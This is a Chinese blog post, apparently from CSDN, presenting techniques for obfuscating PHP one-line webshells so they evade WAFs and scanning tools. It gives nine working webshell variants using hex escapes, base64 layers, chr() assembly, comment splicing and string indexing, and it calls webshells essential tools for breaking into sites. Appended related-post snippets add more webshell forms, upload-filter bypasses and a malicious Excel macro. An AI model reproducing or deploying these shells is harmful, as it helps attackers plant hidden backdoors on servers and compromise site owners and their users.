一句话木马绕过检测的常见思路

最新推荐文章于 2024-07-20 21:28:14 发布
最新推荐文章于 2024-07-20 21:28:14 发布
阅读量1w 收藏 33
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/momo_sleet/article/details/82497520
版权

0x0 背景

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用,居家生活搞站越货必备神器。主要总结一下常见的绕过安全检测的思路,欢迎各位大佬参与讨论。

0x1 关键函数编码

主要通过一些字符串对关键的几个函数比如eval、assert等函数进行变换绕过检测

如下代码使用\x65编码字符串’e’,使用array类型进行混淆:

<?php array_map("ass\x65rt",(array)$_REQUEST['si1ence']);?>    //1.php

<?php array_map("as\x73ert",(array)$_REQUEST['si1ence'];?>     //2.php

<?php $item['wind'] = 'assert'; $array[] = $item; $array[0]['wind']($_POST['si1ence']);?> //3.php

<?php eval(str_rot13('riny($_CBFG[cntr]);'));?> // 4.php

0x2 base64编码绕过

使用base64解码assert函数

<?php $x=base64_decode("YXNzZXJ0");$x($_POST['si1ence']);?> //5.php

多次使用base64解码一句话内容、能绕过部分安全工具检测:

<?php eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw));?> //6.php

0x3 字符编码绕过

使用是一些字符编码的方式进行绕过关键字的匹配行为,举例如下:

<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?> //7.php

0x4 注释混淆

使用注释对字符串的拼接进行干扰

<?php @$_="s"."s"./*-



*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/

/

*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>     //8.php

0x5 多字符串拼接

<?php

$__C_C="WlhaaGJDZ2tYMUJQVTFSYmVGMHBPdz09";

$__P_P="abcdefghijklmnopqrstuvwxyz";

$__X_X="123456789";

$__O_O=$__X_X[5].$__X_X[3]."_";

$__B_B=$__P_P{1}.$__P_P[0].$__P_P[18].$__P_P[4];

$__H_H=$__B_B.$__O_O.$__P_P[3].$__P_P[4].$__P_P[2].$__P_P[14].$__P_P[3].$__P_P[4];

$__E_E=$__P_P[4].$__P_P[21].$__P_P[0].$__P_P[11];

$__F_F=$__P_P[2].$__P_P[17].$__P_P[4].$__P_P[0].$__P_P[19].$__P_P[4];

$__F_F.='_'.$__P_P[5].$__P_P[20].$__P_P[13].$__P_P[2].$__P_P[19].$__P_P[8].$__P_P[14].$__P_P[13];

$_[00]=$__F_F('$__S_S',$__E_E.'("$__S_S");');

@$_[00]($__H_H($__H_H($__C_C)));

?>      //9.php

0x6 工具查杀

这里使用流行的安全工具进行查杀做一个简单的对比

 

si1ence_whitehat
关注
文件上传漏洞 绕过分析
m0_64118193的博客
06-18 1530
目录1.一句话木马常见函数1.前端js绕过文件漏洞绕过2.文件类型绕过(MIME)3.黑名单绕过-同类型绕过 4. 黑名单绕过-.htaccess绕过5.黑名单绕过-点空格点绕过6.黑名单绕过-大小写文件绕过7.黑名单绕过-空格绕过8.黑名单绕过-点绕过9.黑名单绕过-win10文件流特征绕过10.黑名单绕过-双写绕过*蚁剑连接,获取权限文件上传靶场链接下载 Search · upload · GitHub在很多渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提取权限,不
ctf PHP一句话木马,网络内生安全试验场——CTF答题夺旗赛(第三季)Web详细Writeup...
weixin_33903769的博客
03-20 1364
CTF夺旗赛第三季WEB题目Writeup这次比赛的Web题目都比较基础,总共有五道,考察的知识点也都比较明显,所以借这次的题目来简单介绍一下几种漏洞的简单利用方法,下面的解题过程有的地方会写的比较细,主要是写给我们萌新看的,大佬们轻喷。weak题目难度 ⭐php中有两种比较的符号 == 与 === ,=== 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较== 在进行比较的时候,会先将...
一句话木马及几种可绕过过滤格式
收集盒 Book box
04-12 3831
<br /><br />ASP一句话<br /> <br />1.<%eval request("YouPass")%><br /> <br />2. <%executerequest("YouPass")%><br /> <br />3. <%execute(request("YouPass"))%><br /> <br />免杀大部分网站的一句话<br /> <br />4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1"
php一句话木马变形技巧
热门推荐
bylfsj的博客
09-24 4万+
一、什么是一句话木马一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 二、我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ...
CTF-web题 一句话木马
最新发布
2302_80276789的博客
07-20 186
php标签为框架,里面的东西七主要作用,@符号是指我们@谁,使不报错,eval是将后面里面的当作php代码执行,$_post[‘a’]为接受psot方法 来接受a这个参数a.可以将a传入system,系统命令等,就可以实现控制作用。链接密码为参数a,进行链接,然后添加。双击进入,此时服务器已经被我们控制。我们便可以查看服务器的文件,我们可以在根目录下找到一个flag文件,点击进去,就可以得到flag。接下来使用中国蚁剑进行连接,打开之后,复制网址,点击右键,添加数据,将url添加进来。
绕过WAF-一句话木马
qq_30787769的博客
12-10 2612
注:本次的测试环境是最新的安全狗Apache:V4.0 一句话木马:<?php eval($_REQUEST['a'])?> 1.但是这样写容易被安全狗这些拦截,所以可以考虑替换某些函数,比如eval换成assert()或者reate_function()或者是call_user_func() 2.使用end()函数来代替,可以写成: <?php eval(end($_REQUE...
一句话木马WAF绕过
CheAyuki13的博客
10-03 490
原理WAF通常会以关键字判断是否为一句话木马,所以要将一句话木马变形使用,从而绕过 waf:1.php变量函数<?php $a = "assert"; $a($_POST['-7']); ?>2.str_replace函数<?php $a = str_replace("b", "", "absbsbebrbt")...
一句话木马是什么?代码实例及绕过方法
白帽子凯哥聊黑客
12-19 1401
一句话木马是指一种短小的、通常只有一行代码的恶意软件,它被用来在目标系统中执行攻击者的命令或代码。这种类型的木马通常通过各种途径被注入到目标系统中,一旦成功运行,攻击者就可以远程控制受感染的系统。一句话木马的目的包括窃取敏感信息、执行恶意操作、建立持久性访问等。这种木马的特点是简洁、隐蔽,使得攻击者能够轻松地操控目标系统。
DVWA-文件上传全等级绕过一句话木马+中国菜刀+蚁剑)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 1万+
DVWA文件上传前言一、low级别1.1 一句话木马1.2 中国菜刀使用1.3 蚁剑二、Medium级别三、High级别四、Impossible级别 前言     文件上传漏洞是对于上传文件的类型内容没有进行严格的过滤检查,使得攻击者可以通过上传一些木马获取服务器的webshell,因此文件上传漏洞带来的危害通常都是致命的。 一、low级别 打开dvwa,File Upload     会看到有红色报错,具体解决办法请参考我的
php过waf 一句话,(转)一句话木马绕过WAF
weixin_39897070的博客
03-16 2013
在渗透测试的后期,为了维持权限。我们通常都会选择使用大小马或者通过添加账户等各种各样的方式给自己留个后门。但是事情总不是一帆风顺的,在上传一句话木马以及使用一句话木马的过程中我们要跟WAF斗智斗勇。今天这期我们从一句话木马的工作机制和WAF工作机制入手来讲如何绕过WAF的检测。一、一句话木马和WAF介绍在这里就不再科普一句话木马的介绍,不明白的得可以看这里:一句话木马-百度百科。WAF的介绍可以看...
绕过D盾的一句话
03-05 5734
一个很简单的一个技巧,作个笔记,可以绕过D盾检测。 新建test1.php &lt;?php eval($_POST[g]); ?&gt; 新建test2.php &lt;?php $a="$_POST[g]"; eval($a=$a); ?&gt; 使用D盾_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。 那么问题就出现...
一句话木马以及免杀
抚琴
01-08 3919
此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础 查杀软件我首先:D盾 『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计!限制了
php黑名单绕过,文件上传漏洞之黑名单检测绕过
weixin_39683172的博客
03-11 1582
0x00 前言文件上传是一个很常见的功能,文件上传漏洞也比较普遍,原理简单,造成的危害却很大,是一个入门级别的漏洞。这篇文章主要针对文件上传漏洞中的 黑名单检测绕过 这个点,结合upload-labs,做一个较为全面的总结。upload-labsupload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20...
正则表达式以及相关案例绕过复现
CYLK1987310466的博客
07-23 547
正则表达式的学习
关于父进程和子进程的关系(UAC 绕过思路)
byteway的专栏
05-11 6501
表面上看,在windows中。如果是a进程创建了b进程,那么a进程就是b进程的父进程,反之,如果是b创建了a,那么b进程就是a的父进程,这是在windows出现以来一直是程序猿们都证实的,但是在在win Vista后面有了一个新安全消息机制,UAC(user account control),这里科普下UAC的功能,其实UAC就是大家常见的安装软件或者启动程序的时候的出现的全屏变暗的一个提示框,这
一句话木马,小马,大马,混淆一句话木马
Jim的博客
08-30 8281
php                 @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';                   @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';                   @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}               
后台登录密码绕过+sql注入+一句话木马 实验演示(盾灵)
hxxjxw的博客
07-09 1万+
环境 Windows Server 2008(虚拟机) 安装phpStudy,安装dunling 盾灵投稿系统 dunling是一个CMS在线内容管理器 dirb是Kali内置的一个基于字典的Web目录扫描工具,用来爆破目录的 假设已经知道管理员的登陆用户名是admin 实验演示 ①在Windows Server 2008中安装phpStudy,关闭防火墙 下载盾灵...
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_39616693的博客
03-18 851
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
excel一句话木马
01-26
Excel一句话木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被窃取。 以下是一个示例,展示了如何在Excel中创建一句话木马: ```vba Sub Auto_Open() Dim shell As Object Set shell = CreateObject("WScript.Shell") shell.Run "cmd.exe /c your_malicious_command", 0 End Sub ``` 在上述示例中,恶意宏代码使用`WScript.Shell`对象创建一个命令行窗口,并执行`your_malicious_command`命令。这个命令可以是任何你想要在受害者计算机上执行的恶意操作。 请注意,使用恶意宏代码进行攻击是非法的,并且可能导致法律责任。为了保护自己的计算机安全,建议不要打开来自不信任来源的Excel文件,并确保你的计算机有最新的安全补丁和防病毒软件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值